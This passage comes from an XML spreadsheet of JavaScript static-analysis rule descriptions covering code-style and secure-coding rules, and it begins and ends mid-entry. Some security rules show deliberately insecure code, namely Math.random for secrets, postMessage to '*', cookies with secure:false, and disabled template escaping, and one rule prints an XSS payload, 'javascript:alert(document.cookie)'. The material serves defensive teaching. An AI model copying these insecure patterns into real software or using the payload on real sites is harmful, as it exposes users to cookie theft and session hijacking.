  if (a &amp;gt; 4) {
    console.log(x);
  }
  for (var i = 0; i &amp;lt; m; i++) { // Noncompliant, both loops use same variable
  }
  for (var i = 0; i &amp;lt; n; i++) {
  }
  return a + b;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function doSomething(a, b) {
  var x;
  if (a &amp;gt; b) {
    x = a - b;
  }
  if (a &amp;gt; 4) {
    console.log(x);
  }
  for (let i = 0; i &amp;lt; m; i++) {
  }
  for (let i = 0; i &amp;lt; n; i++) {
  }
  return a + b;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2245</t>
  </si>
  <si>
    <t>Using pseudorandom number generators (PRNGs) is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6386"&gt;CVE-2013-6386&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3419"&gt;CVE-2006-3419&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4102"&gt;CVE-2008-4102&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that
will be generated, and use this guess to impersonate another user or access sensitive information.&lt;/p&gt;
&lt;p&gt;As the &lt;code&gt;Math.random()&lt;/code&gt; function relies on a weak pseudorandom number generator, this function should not be used for security-critical
applications or for protecting sensitive data. In such context, a cryptographically strong pseudorandom number generator (CSPRNG) should be used
instead.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such
  as a password, is hashed. &lt;/li&gt;
  &lt;li&gt; the function you use generates a value which can be predicted (pseudo-random). &lt;/li&gt;
  &lt;li&gt; the generated value is used multiple times. &lt;/li&gt;
  &lt;li&gt; an attacker can access the generated value. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Use a cryptographically strong pseudorandom number generator (CSPRNG) like &lt;code&gt;crypto.getRandomValues()&lt;/code&gt;. &lt;/li&gt;
  &lt;li&gt; Use the generated random values only once. &lt;/li&gt;
  &lt;li&gt; You should not expose the generated random value. If you have to store it, make sure that the database or file is secure. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const val = Math.random(); // Sensitive
// Check if val is used in a security context.
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
// === Client side ===
const crypto = window.crypto || window.msCrypto;
var array = new Uint32Array(1);
crypto.getRandomValues(array); // Compliant for security-sensitive use cases
// === Server side ===
const crypto = require('crypto');
const buf = crypto.randomBytes(1); // Compliant for security-sensitive use cases
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements"&gt;Mobile AppSec
  Verification Standard&lt;/a&gt; - Cryptography Requirements &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-mobile-top-10/2016-risks/m5-insufficient-cryptography"&gt;OWASP Mobile Top 10 2016 Category M5&lt;/a&gt; -
  Insufficient Cryptography &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/338.html"&gt;MITRE, CWE-338&lt;/a&gt; - Use of Cryptographically Weak Pseudo-Random Number Generator
  (PRNG) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/330.html"&gt;MITRE, CWE-330&lt;/a&gt; - Use of Insufficiently Random Values &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/326.html"&gt;MITRE, CWE-326&lt;/a&gt; - Inadequate Encryption Strength &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/1241.html"&gt;MITRE, CWE-1241&lt;/a&gt; - Use of Predictable Algorithm in Random Number Generator &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://h3xstream.github.io/find-sec-bugs/bugs.htm#PREDICTABLE_RANDOM"&gt;Predictable Pseudo Random Number
  Generator&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2819</t>
  </si>
  <si>
    <t>Origins should be verified during cross-origin communications</t>
  </si>
  <si>
    <t>&lt;p&gt;Browsers &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage"&gt;allow message exchanges&lt;/a&gt; between Window objects of
different origins.&lt;/p&gt;
&lt;p&gt;Because any window can send / receive messages from other window it is important to verify the senderâ€™s / receiverâ€™s identity:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; When sending message with postMessage method, the identityâ€™s receiver should be defined (the wildcard keyword (&lt;code&gt;*&lt;/code&gt;) should not be
  used). &lt;/li&gt;
  &lt;li&gt; When receiving message with message event, the senderâ€™s identity should be verified using the origin and possibly source properties. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;When sending message:&lt;/p&gt;
&lt;pre&gt;
var iframe = document.getElementById("testiframe");
iframe.contentWindow.postMessage("secret", "*"); // Noncompliant: * is used
&lt;/pre&gt;
&lt;p&gt;When receiving message:&lt;/p&gt;
&lt;pre&gt;
window.addEventListener("message", function(event) { // Noncompliant: no checks are done on the origin property.
      console.log(event.data);
 });
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;When sending message:&lt;/p&gt;
&lt;pre&gt;
var iframe = document.getElementById("testsecureiframe");
iframe.contentWindow.postMessage("hello", "https://secure.example.com"); // Compliant
&lt;/pre&gt;
&lt;p&gt;When receiving message:&lt;/p&gt;
&lt;pre&gt;
window.addEventListener("message", function(event) {
  if (event.origin !== "http://example.org") // Compliant
    return;
  console.log(event.data)
});
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10_2010-A3-Broken_Authentication_and_Session_Management"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; -
  Broken Authentication and Session Management &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage"&gt;developer.mozilla.org&lt;/a&gt; - postMessage API &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4326</t>
  </si>
  <si>
    <t>"await" should not be used redundantly</t>
  </si>
  <si>
    <t>&lt;p&gt;An &lt;code&gt;async&lt;/code&gt; function always wraps the return value in a &lt;code&gt;Promise&lt;/code&gt;. Using &lt;code&gt;return await&lt;/code&gt; is therefore redundant.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
async function foo() {
  // ...
}
async function bar() {
  // ...
  return await foo(); // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
async function foo() {
  // ...
}
async function bar() {
  // ...
  return foo();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1763</t>
  </si>
  <si>
    <t>All code should be reachable</t>
  </si>
  <si>
    <t>&lt;p&gt;Jump statements (&lt;code&gt;return&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt; and &lt;code&gt;continue&lt;/code&gt;) and &lt;code&gt;throw&lt;/code&gt; expressions move control flow out of the
current code block. So any statements that come after a jump are dead code.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function fun(a) {
  var i = 10;
  return i + a;
  i++;             // Noncompliant; this is never executed
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function fun(int a) {
  var i = 10;
  return i + a;
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This rule ignores unreachable &lt;code&gt;break&lt;/code&gt; statements in &lt;code&gt;switch&lt;/code&gt; clauses.&lt;/p&gt;
&lt;pre&gt;
switch (x) {
  case 42:
     return 43;
     break;   // Compliant
  default:
    doSomething();
}
&lt;/pre&gt;
&lt;p&gt;Hoisted variables declarations without initialization are always considered reachable.&lt;/p&gt;
&lt;pre&gt;
function bar() {
  return x = function() {
    x.foo = 42;
  }
  var x;
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/561.html"&gt;MITRE, CWE-561&lt;/a&gt; - Dead Code &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1481</t>
  </si>
  <si>
    <t>Unused local variables and functions should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability
because developers will not wonder what the variable or function is used for.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function numberOfMinutes(hours) {
  var seconds = 0;   // seconds is never used
  return hours * 60;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function numberOfMinutes(hours) {
  return hours * 60;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1128</t>
  </si>
  <si>
    <t>Unnecessary imports should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;Thereâ€™s no reason to import modules you donâ€™t use; and every reason not to: doing so needlessly increases the load.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
import A from 'a';      // Noncompliant, A isn't used
import { B1 } from 'b';
console.log(B1);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
import { B1 } from 'b';
console.log(B1);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1479</t>
  </si>
  <si>
    <t>"switch" statements should not have too many "case" clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;When &lt;code&gt;switch&lt;/code&gt; statements have large sets of &lt;code&gt;case&lt;/code&gt; clauses, it is usually an attempt to map two sets of data. A real map
structure would be more readable and maintainable, and should be used instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S878</t>
  </si>
  <si>
    <t>Comma operator should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The comma operator takes two expressions, executes them from left to right and returns the result of the second one. Use of this operator is
generally detrimental to the readability and reliability of code, and the same effect can be achieved by other means.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
i = a += 2, a + b;  // What's the value of i ?
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
a +=  2;
i = a + b;
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Use of comma operator is tolerated:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; in initialization and increment expressions of &lt;code&gt;for&lt;/code&gt; loops. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
for(i = 0, j = 5; i &amp;lt; 6; i++, j++) { ... }
&lt;/pre&gt;
&lt;ul&gt;
  &lt;li&gt; If the expression sequence is explicitly wrapped in parentheses. &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1110</t>
  </si>
  <si>
    <t>Redundant pairs of parentheses should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of parentheses, even those not required to enforce a desired order of operations, can clarify the intent behind a piece of code. But
redundant pairs of parentheses could be misleading, and should be removed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let x = (y / 2 + 1);   //Compliant even if those parenthesis are useless for the compiler
if (a &amp;amp;&amp;amp; ((x+y &amp;gt; 0))) {  // Noncompliant
  //...
}
return ((x + 1));  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let x = (y / 2 + 1);
if (a &amp;amp;&amp;amp; (x+y &amp;gt; 0)) {
  //...
}
return (x + 1);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1821</t>
  </si>
  <si>
    <t>"switch" statements should not be nested</t>
  </si>
  <si>
    <t>&lt;p&gt;Nested &lt;code&gt;switch&lt;/code&gt; structures are difficult to understand because you can easily confuse the cases of an inner &lt;code&gt;switch&lt;/code&gt; as
belonging to an outer statement. Therefore nested &lt;code&gt;switch&lt;/code&gt; statements should be avoided.&lt;/p&gt;
&lt;p&gt;Specifically, you should structure your code to avoid the need for nested &lt;code&gt;switch&lt;/code&gt; statements, but if you cannot, then consider moving
the inner &lt;code&gt;switch&lt;/code&gt; to another function.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo(n, m) {
  switch (n) {
    case 0:
      switch (m) {  // Noncompliant; nested switch
        // ...
      }
    case 1:
      // ...
    default:
      // ...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo(n, m) {
  switch (n) {
    case 0:
      bar(m);
    case 1:
      // ...
    default:
      // ...
  }
}
function bar(m) {
  switch(m) {
    // ...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1940</t>
  </si>
  <si>
    <t>Boolean checks should not be inverted</t>
  </si>
  <si>
    <t>&lt;p&gt;It is needlessly complex to invert the result of a boolean comparison. The opposite comparison should be made instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (!(a === 2)) { ... }  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (a !== 2) { ... }
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3317</t>
  </si>
  <si>
    <t>Default export names and file names should match</t>
  </si>
  <si>
    <t>&lt;p&gt;By convention, a file that exports only one class, function, or constant should be named for that class, function or constant. Anything else may
confuse maintainers.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
// file path: myclass.js  -- Noncompliant
class MyClass {
  // ...
}
export default MyClass;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
// file path: MyClass.js
class MyClass {
  // ...
}
export default MyClass;
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Case, underscores ( &lt;code&gt;_&lt;/code&gt; ) and dashes (&lt;code&gt;-&lt;/code&gt;) are ignored from the name comparison.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1131</t>
  </si>
  <si>
    <t>Lines should not end with trailing whitespaces</t>
  </si>
  <si>
    <t>&lt;p&gt;Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same
file.&lt;/p&gt;
&lt;p&gt;If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the
opportunity to do so.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
// The following string will error if there is a whitespace after '\'
var str = "Hello \
World";
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4524</t>
  </si>
  <si>
    <t>"default" clauses should be last</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;switch&lt;/code&gt; can contain a &lt;code&gt;default&lt;/code&gt; clause for various reasons: to handle unexpected values, to show that all the cases were
properly considered.&lt;/p&gt;
&lt;p&gt;For readability purpose, to help a developer to quickly find the default behavior of a &lt;code&gt;switch&lt;/code&gt; statement, it is recommended to put the
&lt;code&gt;default&lt;/code&gt; clause at the end of the &lt;code&gt;switch&lt;/code&gt; statement. This rule raises an issue if the &lt;code&gt;default&lt;/code&gt; clause is not the
first or the last one of the &lt;code&gt;switch&lt;/code&gt;'s cases.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch (param) {
  case 0:
    doSomething();
    break;
  default: // default clause should be the first or last one
    error();
    break;
  case 1:
    doSomethingElse();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
switch (param) {
  case 0:
    doSomething();
    break;
  case 1:
    doSomethingElse();
    break;
  default:
    error();
    break;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S122</t>
  </si>
  <si>
    <t>Statements should be on separate lines</t>
  </si>
  <si>
    <t>&lt;p&gt;For better readability, do not put more than one statement on a single line.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
foo(); bar(); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
foo();
bar();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2092</t>
  </si>
  <si>
    <t>Creating cookies without the "secure" flag is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;When a cookie is protected with the &lt;code&gt;secure&lt;/code&gt; attribute set to &lt;em&gt;true&lt;/em&gt; it will not be send by the browser over an unencrypted HTTP
request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the cookie is for instance a &lt;em&gt;session-cookie&lt;/em&gt; not designed to be sent over non-HTTPS communication. &lt;/li&gt;
  &lt;li&gt; itâ€™s not sure that the website contains &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content"&gt;mixed content&lt;/a&gt; or not
  (ie HTTPS everywhere or not) &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; It is recommended to use &lt;code&gt;HTTPs&lt;/code&gt; everywhere so setting the &lt;code&gt;secure&lt;/code&gt; flag to &lt;em&gt;true&lt;/em&gt; should be the default behaviour
  when creating cookies. &lt;/li&gt;
  &lt;li&gt; Set the &lt;code&gt;secure&lt;/code&gt; flag to &lt;em&gt;true&lt;/em&gt; for session-cookies. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookie-session"&gt;cookie-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let session = cookieSession({
  secure: false,// Sensitive
});  // Sensitive
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express-session"&gt;express-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const session = require('express-session');
let app = express();
app.use(session({
  cookie:
  {
    secure: false // Sensitive
  }
}));
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookies"&gt;cookies&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let cookies = new Cookies(req, res, { keys: keys });
cookies.set('LastVisit', new Date().toISOString(), {
  secure: false // Sensitive
}); // Sensitive
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;csurf&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');
let csrfProtection = csrf({ cookie: { secure: false }}); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookie-session"&gt;cookie-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let session = cookieSession({
  secure: true,// Compliant
});  // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express-session"&gt;express-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const session = require('express-session');
let app = express();
app.use(session({
  cookie:
  {
    secure: true // Compliant
  }
}));
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookies"&gt;cookies&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let cookies = new Cookies(req, res, { keys: keys });
cookies.set('LastVisit', new Date().toISOString(), {
  secure: true // Compliant
}); // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;csurf&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');
let csrfProtection = csrf({ cookie: { secure: true }}); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/311"&gt;MITRE, CWE-311&lt;/a&gt; - Missing Encryption of Sensitive Data &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/315"&gt;MITRE, CWE-315&lt;/a&gt; - Cleartext Storage of Sensitive Information in a Cookie &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/614"&gt;MITRE, CWE-614&lt;/a&gt; - Sensitive Cookie in HTTPS Session Without 'Secure' Attribute &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S6331</t>
  </si>
  <si>
    <t>Regular expressions should not contain empty groups</t>
  </si>
  <si>
    <t>&lt;p&gt;There are several reasons to use a group in a regular expression:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; to change the precedence (e.g. &lt;code&gt;/do(g|or)/&lt;/code&gt; will match 'dog' and 'door') &lt;/li&gt;
  &lt;li&gt; to remember parenthesised part of the match in the case of capturing group &lt;/li&gt;
  &lt;li&gt; to improve readability &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In any case, having an empty group is most probably a mistake. Either it is a leftover after refactoring and should be removed, or the actual
parentheses were intended and were not escaped.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const dateRegex = /^(?:0[1-9]|[12][0-9]|3[01])[- /.](?:0[1-9]|1[012])[- /.](?:19|20)\d\d(?:)$/; // Noncompliant, useless group at the end
const methodCallRegex = /foo()/;  // Noncompliant, will match only 'foo'
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const dateRegex = /^(?:0[1-9]|[12][0-9]|3[01])[- /.](?:0[1-9]|1[012])[- /.](?:19|20)\d\d$/;
const methodCallRegex = /foo\(\)/; // OK, matches 'foo()'
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5247</t>
  </si>
  <si>
    <t>Disabling auto-escaping in template engines is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;To reduce the risk of cross-site scripting attacks, templating systems, such as &lt;code&gt;Twig&lt;/code&gt;, &lt;code&gt;Django&lt;/code&gt;, &lt;code&gt;Smarty&lt;/code&gt;,
&lt;code&gt;Groovy's template engine&lt;/code&gt;, allow configuration of automatic variable escaping before rendering templates. When escape occurs, characters
that make sense to the browser (eg: &amp;lt;a&amp;gt;) will be transformed/replaced with escaped/sanitized values (eg: &amp;amp; lt;a&amp;amp; gt; ).&lt;/p&gt;
&lt;p&gt;Auto-escaping is not a magic feature to annihilate all cross-site scripting attacks, it depends on &lt;a
href="https://twig.symfony.com/doc/3.x/filters/escape.html"&gt;the strategy applied&lt;/a&gt; and the context, for example a "html auto-escaping" strategy
(which only transforms html characters into &lt;a href="https://developer.mozilla.org/en-US/docs/Glossary/Entity"&gt;html entities&lt;/a&gt;) will not be relevant
when variables are used in a &lt;a href="https://en.wikipedia.org/wiki/HTML_attribute"&gt;html attribute&lt;/a&gt; because '&lt;code&gt;:&lt;/code&gt;' character is not
escaped and thus an attack as below is possible:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;a href="{{ myLink }}"&amp;gt;link&amp;lt;/a&amp;gt; // myLink = javascript:alert(document.cookie)
&amp;lt;a href="javascript:alert(document.cookie)"&amp;gt;link&amp;lt;/a&amp;gt; // JS injection (XSS attack)
&lt;/pre&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Templates are used to render web content and
    &lt;ul&gt;
      &lt;li&gt; dynamic variables in templates come from untrusted locations or are user-controlled inputs &lt;/li&gt;
      &lt;li&gt; there is no local mechanism in place to sanitize or validate the inputs. &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right
one.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/mustache"&gt;mustache.js&lt;/a&gt; template engine:&lt;/p&gt;
&lt;pre&gt;
let Mustache = require("mustache");
Mustache.escape = function(text) {return text;}; // Sensitive
let rendered = Mustache.render(template, { name: inputName });
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/handlebars"&gt;handlebars.js&lt;/a&gt; template engine:&lt;/p&gt;
&lt;pre&gt;
const Handlebars = require('handlebars');
let source = "&amp;lt;p&amp;gt;attack {{name}}&amp;lt;/p&amp;gt;";
let template = Handlebars.compile(source, { noEscape: true }); // Sensitive
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/markdown-it"&gt;markdown-it&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
const markdownIt = require('markdown-it');
let md = markdownIt({
  html: true // Sensitive
});
let result = md.render('# &amp;lt;b&amp;gt;attack&amp;lt;/b&amp;gt;');
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/marked"&gt;marked&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
const marked = require('marked');
marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: false // Sensitive
});
console.log(marked("# test &amp;lt;b&amp;gt;attack/b&amp;gt;"));
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/kramed"&gt;kramed&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
let kramed = require('kramed');
var options = {
  renderer: new kramed.Renderer({
    sanitize: false // Sensitive
  })
};
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/mustache"&gt;mustache.js&lt;/a&gt; template engine:&lt;/p&gt;
&lt;pre&gt;
let Mustache = require("mustache");
let rendered = Mustache.render(template, { name: inputName }); // Compliant autoescaping is on by default
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/handlebars"&gt;handlebars.js&lt;/a&gt; template engine:&lt;/p&gt;
&lt;pre&gt;
const Handlebars = require('handlebars');
let source = "&amp;lt;p&amp;gt;attack {{name}}&amp;lt;/p&amp;gt;";
let data = { "name": "&amp;lt;b&amp;gt;Alan&amp;lt;/b&amp;gt;" };
let template = Handlebars.compile(source); // Compliant by default noEscape is set to false
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/markdown-it"&gt;markdown-it&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
let md = require('markdown-it')(); // Compliant by default html is set to false
let result = md.render('# &amp;lt;b&amp;gt;attack&amp;lt;/b&amp;gt;');
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/marked"&gt;marked&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
const marked = require('marked');
marked.setOptions({
  renderer: new marked.Renderer()
}); // Compliant by default sanitize is set to true
console.log(marked("# test &amp;lt;b&amp;gt;attack/b&amp;gt;"));
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/kramed"&gt;kramed&lt;/a&gt; markup language parser:&lt;/p&gt;
&lt;pre&gt;
let kramed = require('kramed');
let options = {
  renderer: new kramed.Renderer({
